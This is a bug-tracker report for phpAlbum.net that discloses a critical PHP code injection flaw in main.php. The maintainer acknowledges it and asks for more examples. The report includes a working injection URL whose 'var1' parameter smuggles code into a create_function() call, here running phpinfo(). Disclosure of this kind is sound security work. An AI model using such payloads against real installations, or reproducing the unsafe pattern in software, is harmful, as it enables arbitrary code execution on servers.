php code injection attack

Project:phpAlbum.net
Version:0.4.1-14_fix05
Component:Code
Category:bug
Priority:critical
Assigned:patrik
Status:in work
Description

You can execute arbitrary php commands by passing main.php specially crafted parameters. For example,

main.php?cmd=setquality&var1=1'.phpinfo().'

will result in a "create_funtion()" call that will execute the phpinfo() command.

Updates

#1 submitted by patrik on Thu, 2009-07-16 20:38
Status:new» in work

Thanx for posting! This is by far the most serious bug I ever produced ...
Dou you have more examples?


style="display:inline-block;width:468px;height:60px"
data-ad-client="ca-pub-8698264690166658"
data-ad-slot="4417389723">